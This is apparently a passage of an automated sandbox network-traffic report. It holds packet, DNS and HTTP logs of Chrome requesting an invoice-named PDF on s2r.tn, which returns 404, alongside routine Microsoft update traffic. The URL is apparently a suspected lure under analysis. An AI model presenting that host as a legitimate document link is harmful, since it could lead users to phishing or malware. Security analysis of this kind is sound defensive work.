                                                  May 23, 2024 21:07:32.101465940 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:32.101536036 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:32.154150963 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:32.154160976 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:32.201092005 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:32.410402060 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:32.410446882 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:32.410706997 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:32.412506104 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:32.412527084 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.067471027 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.067622900 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.071666956 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.071677923 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.071969986 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.117902040 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.162498951 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.341023922 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.341100931 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.341214895 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.341310978 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.341329098 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.341445923 CEST49717443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.341454029 CEST443497172.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.401804924 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.401866913 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:33.402373075 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.402499914 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:33.402518034 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.082552910 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.082669020 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:34.084508896 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:34.084517956 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.084737062 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.086620092 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:34.130506992 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.391346931 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.391417980 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.391609907 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:34.399424076 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:34.399446964 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.399460077 CEST49718443192.168.2.92.19.85.159
                                                  May 23, 2024 21:07:34.399466038 CEST443497182.19.85.159192.168.2.9
                                                  May 23, 2024 21:07:34.638729095 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:07:39.891518116 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:39.891552925 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:39.891868114 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:39.893012047 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:39.893033981 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:40.809256077 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:40.809647083 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:40.811259031 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:40.811269999 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:40.811521053 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:40.858006001 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:40.874313116 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:40.918494940 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198208094 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198275089 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198298931 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198333979 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.198342085 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198375940 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198393106 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.198405027 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.198422909 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.198422909 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.198467016 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.211595058 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.211705923 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.211729050 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.211745977 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.211837053 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.212785959 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.212810993 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.212892056 CEST49719443192.168.2.920.114.59.183
                                                  May 23, 2024 21:07:41.212902069 CEST4434971920.114.59.183192.168.2.9
                                                  May 23, 2024 21:07:41.519674063 CEST49704443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:41.519896030 CEST49704443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:41.520276070 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:41.520302057 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:07:41.520375013 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:41.520631075 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:41.520642996 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:07:41.524635077 CEST4434970423.206.229.209192.168.2.9
                                                  May 23, 2024 21:07:41.530356884 CEST4434970423.206.229.209192.168.2.9
                                                  May 23, 2024 21:07:41.999603987 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:41.999666929 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:41.999715090 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:42.204241991 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:07:42.204319000 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:42.297646046 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:42.297669888 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:01.406649113 CEST4434972123.206.229.209192.168.2.9
                                                  May 23, 2024 21:08:01.406738997 CEST49721443192.168.2.923.206.229.209
                                                  May 23, 2024 21:08:14.983787060 CEST4970580192.168.2.988.221.110.64
                                                  May 23, 2024 21:08:14.989464998 CEST804970588.221.110.64192.168.2.9
                                                  May 23, 2024 21:08:14.989569902 CEST4970580192.168.2.988.221.110.64
                                                  May 23, 2024 21:08:17.658000946 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:17.658041000 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:17.658155918 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:17.658579111 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:17.658590078 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.510966063 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.511059999 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.512557030 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.512567043 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.512800932 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.514234066 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.558499098 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.910152912 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.910182953 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.910269976 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.910294056 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.910353899 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.925182104 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.925256968 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.925273895 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.925276995 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.925324917 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.925520897 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.925539017 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:18.925565958 CEST49722443192.168.2.920.114.59.183
                                                  May 23, 2024 21:08:18.925571918 CEST4434972220.114.59.183192.168.2.9
                                                  May 23, 2024 21:08:31.422708988 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:31.422753096 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:31.422863007 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:31.423053980 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:31.423069954 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:32.098472118 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:32.098918915 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:32.098941088 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:32.099677086 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:32.099993944 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:32.100085974 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:32.155567884 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:42.003484011 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:42.003542900 CEST44349724142.250.181.228192.168.2.9
                                                  May 23, 2024 21:08:42.003608942 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:42.297641993 CEST49724443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:08:42.297672987 CEST44349724142.250.181.228192.168.2.9
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 23, 2024 21:07:27.792256117 CEST5241653192.168.2.91.1.1.1
                                                  May 23, 2024 21:07:27.792373896 CEST5303453192.168.2.91.1.1.1
                                                  May 23, 2024 21:07:27.807441950 CEST53566251.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:27.837382078 CEST53569871.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:28.814388990 CEST5885953192.168.2.91.1.1.1
                                                  May 23, 2024 21:07:28.814654112 CEST5673253192.168.2.91.1.1.1
                                                  May 23, 2024 21:07:29.092950106 CEST53588591.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:29.098540068 CEST53567321.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:29.139383078 CEST53608701.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:30.017195940 CEST53524161.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:30.031208992 CEST53530341.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:31.375922918 CEST6186753192.168.2.91.1.1.1
                                                  May 23, 2024 21:07:31.376275063 CEST6341353192.168.2.91.1.1.1
                                                  May 23, 2024 21:07:31.386106968 CEST53618671.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:31.393225908 CEST53634131.1.1.1192.168.2.9
                                                  May 23, 2024 21:07:46.406034946 CEST53573651.1.1.1192.168.2.9
                                                  May 23, 2024 21:08:05.295909882 CEST53560861.1.1.1192.168.2.9
                                                  May 23, 2024 21:08:15.114998102 CEST138138192.168.2.9192.168.2.255
                                                  May 23, 2024 21:08:26.708199024 CEST53558001.1.1.1192.168.2.9
                                                  May 23, 2024 21:08:27.676335096 CEST53514141.1.1.1192.168.2.9
                                                  May 23, 2024 21:08:54.461566925 CEST53545261.1.1.1192.168.2.9
                                                  TimestampSource IPDest IPChecksumCodeType
                                                  May 23, 2024 21:07:30.017267942 CEST192.168.2.91.1.1.1c1f1(Port unreachable)Destination Unreachable
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  May 23, 2024 21:07:27.792256117 CEST192.168.2.91.1.1.10xd522Standard query (0)s2r.tnA (IP address)IN (0x0001)false
                                                  May 23, 2024 21:07:27.792373896 CEST192.168.2.91.1.1.10xa2f3Standard query (0)s2r.tn65IN (0x0001)false
                                                  May 23, 2024 21:07:28.814388990 CEST192.168.2.91.1.1.10x451bStandard query (0)s2r.tnA (IP address)IN (0x0001)false
                                                  May 23, 2024 21:07:28.814654112 CEST192.168.2.91.1.1.10xb06fStandard query (0)s2r.tn65IN (0x0001)false
                                                  May 23, 2024 21:07:31.375922918 CEST192.168.2.91.1.1.10x8a9dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  May 23, 2024 21:07:31.376275063 CEST192.168.2.91.1.1.10x21c8Standard query (0)www.google.com65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  May 23, 2024 21:07:29.092950106 CEST1.1.1.1192.168.2.90x451bNo error (0)s2r.tn70.38.21.234A (IP address)IN (0x0001)false
                                                  May 23, 2024 21:07:30.017195940 CEST1.1.1.1192.168.2.90xd522No error (0)s2r.tn70.38.21.234A (IP address)IN (0x0001)false
                                                  May 23, 2024 21:07:31.386106968 CEST1.1.1.1192.168.2.90x8a9dNo error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                  May 23, 2024 21:07:31.393225908 CEST1.1.1.1192.168.2.90x21c8No error (0)www.google.com65IN (0x0001)false
                                                  • s2r.tn
                                                  • https:
                                                  • fs.microsoft.com
                                                  • slscr.update.microsoft.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.94971170.38.21.2344437696C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:29 UTC669OUTGET /cgi/INVOICERVSHA.pdf HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:07:29 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:07:29 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:07:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.94971270.38.21.2344437696C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:29 UTC588OUTGET /favicon.ico HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:07:30 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:07:30 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:07:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.94971470.38.21.2344437696C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:30 UTC341OUTGET /cgi/INVOICERVSHA.pdf HTTP/1.1
                                                  Host: s2r.tn
                                                  Connection: keep-alive
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-Dest: empty
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-05-23 19:07:30 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:07:30 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:07:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.9497172.19.85.159443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-05-23 19:07:33 UTC467INHTTP/1.1 200 OK
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF06)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-eus-z1
                                                  Cache-Control: public, max-age=248563
                                                  Date: Thu, 23 May 2024 19:07:33 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.9497182.19.85.159443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-05-23 19:07:34 UTC535INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                  Cache-Control: public, max-age=248494
                                                  Date: Thu, 23 May 2024 19:07:34 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-05-23 19:07:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.94971920.114.59.183443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:40 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BCBY8ZxyE7AZX3U&MD=h1X+NoXU HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-05-23 19:07:41 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                  MS-CorrelationId: 5c6376cb-bef3-43bb-aa04-d8872385d4fc
                                                  MS-RequestId: 4968cd2c-5f7e-4f90-ad08-fa5f7ec73098
                                                  MS-CV: HEm/tzhB4kWD/S1v.0
                                                  X-Microsoft-SLSClientCache: 2880
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 23 May 2024 19:07:40 GMT
                                                  Connection: close
                                                  Content-Length: 24490
                                                  2024-05-23 19:07:41 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
